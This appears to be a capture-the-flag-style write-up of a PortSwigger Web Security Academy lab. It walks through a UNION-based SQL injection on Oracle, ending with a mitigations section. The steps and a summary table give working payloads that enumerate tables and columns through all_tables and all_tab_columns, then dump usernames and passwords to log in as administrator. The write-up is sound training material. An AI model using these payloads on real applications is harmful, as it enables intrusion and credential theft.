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LAB WRITEUP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SQL Injection — Listing Database Contents on Oracle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PortSwigger Web Security Academy  |  Practitioner Level  |  UNION-Based Attack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 Lab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 attack, listing the database contents on Oracle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Practitioner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 — UNION-based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as the administrator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Burp Suite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Solved ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="12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 Discovered Assets (Real Lab Values)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tables, columns, and credentials were uncovered during this lab run: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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="58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Discovered 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 table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USERS_NBAHEN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column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USERNAME_PBHUYL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column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PASSWORD_XAYXIY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table found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APP_USERS_AND_ROLES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Alternate table explored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users_xgbxrm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Alternate username col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username_gdzqqj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Alternate password col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password_qojmen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="12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 Vulnerability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application passes the category filter parameter directly into a SQL query with no sanitisation. Because query results are reflected in the HTTP response, a UNION-based attack can extract arbitrary data from the database.</w:t>
      </w:r>
    </w:p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prerequisites must hold for a UNION attack to succeed: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injected SELECT must return the same number of columns as the original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column position must use a compatible data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Oracle, every SELECT must include a FROM clause — FROM dual is used when no real table is needed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="12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 Attack Walkthrough (With Real Payloads)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Step 1 — Intercept the Request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Burp Suite, enable proxy intercept, and browse to the product listing. Select any category to trigger the vulnerable request. Send it to Repeater for repeated testing.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Step 2 — Confirm Column Count and Types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for two text-compatible columns using Oracle's dual table:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="f4f4f4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'+UNION+SELECT+'abc','def'+FROM+dual--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the page renders with no error and the strings appear in the output, the query returns exactly 2 text columns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="12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The payload '+UNION+SELECT+@@version,'def'+FROM+dual-- FAILS on Oracle. @@version is MySQL/MSSQL syntax. Oracle uses SELECT banner FROM v$version.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Step 3 — List All Tables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Query Oracle's all_tables data dictionary view:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="f4f4f4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'+UNION+SELECT+table_name,NULL+FROM+all_tables--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Scrolling through the output reveals two tables of interest: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USERS_NBAHEN — the target credentials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APP_USERS_AND_ROLES — a secondary table also explored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Step 4 — Enumerate Columns of the Credentials Table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Query all_tab_columns to list columns of USERS_NBAHEN:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="f4f4f4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'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_NBAHEN'--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Columns found: USERNAME_PBHUYL and PASSWORD_XAYXIY.</w:t>
      </w:r>
    </w:p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APP_USERS_AND_ROLES was also probed separately:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="f4f4f4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' UNION SELECT NAME, NULL FROM all_tab_columns WHERE table_name = 'APP_USERS_AND_ROLES'--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Step 5 — Dump All Credentials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Extract all usernames and passwords from the confirmed table:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="f4f4f4" w:val="clear"/>
        <w:spacing w:after="100" w:before="10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' UNION SELECT USERNAME_PBHUYL,PASSWORD_XAYXIY FROM USERS_NBAHEN--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product listing renders each row as a result, exposing all user credentials including the administrator account.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Step 6 — Log In as Administrator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Locate the administrator row in the dumped output, copy the password, navigate to /login, and authenticate. The lab is marked solved on successful login.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="12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 Full Payload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count check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'+UNION+SELECT+'abc','def'+FROM+dual--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2 text columns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check (failed)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'+UNION+SELECT+@@version,'def'+FROM+dual--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Not Oracle syntax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tables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'+UNION+SELECT+table_name,NULL+FROM+all_tables--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 USERS_NBAHEN, APP_USERS_AND_ROLES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cols (main table)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'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns WHERE table_name='USERS_NBAHEN'--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 USERNAME_PBHUYL, PASSWORD_XAYXIY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cols (alt table)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' UNION SELECT NAME, NULL FROM all_tab_columns WHERE table_name = 'APP_USERS_AND_ROLES'--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Enumerated APP_USERS_AND_ROLES columns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Dump credentials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' UNION SELECT USERNAME_PBHUYL,PASSWORD_XAYXIY FROM USERS_NBAHEN--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Credentials extracted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 table dump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' UNION SELECT username_gdzqqj, password_qojmen FROM users_xgbxrm--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Explored alternate table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="12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 Oracle-Specific Syntax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260"/>
      </w:tblGrid>
      <w:t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Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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MySQL / MSSQL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 SELECT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SELECT 'x' FROM dual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SELECT 'x'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string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SELECT banner FROM v$version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SELECT @@version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tables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SELECT table_name FROM all_tables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SELECT table_name FROM information_schema.tables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columns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SELECT column_name FROM all_tab_columns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SELECT column_name FROM information_schema.columns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concat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col1 || ':' || col2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CONCAT(col1,':',col2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="12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 Mitigations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fix: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameterized Queries / Prepared Statements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Never concatenate user input into SQL. Use bind variables so input is treated as data, never as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 accounts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Least Privilege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The app's DB user should have no access to all_tables, all_tab_columns, or v$version.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Secondary control: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Input Validation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Whitelist acceptable category values server-side; reject anything unexpected.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Operational hygiene: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Suppress Errors in Production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Never expose database errors to end users. Log them server-side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Defence-in-depth: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application Firewall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A WAF can detect and block common UNION injection patterns as a secondary layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="16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PortSwigger Web Security Academy  |  For educational purposes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2026-04-06T18:25:03.093Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T18:25:03.094Z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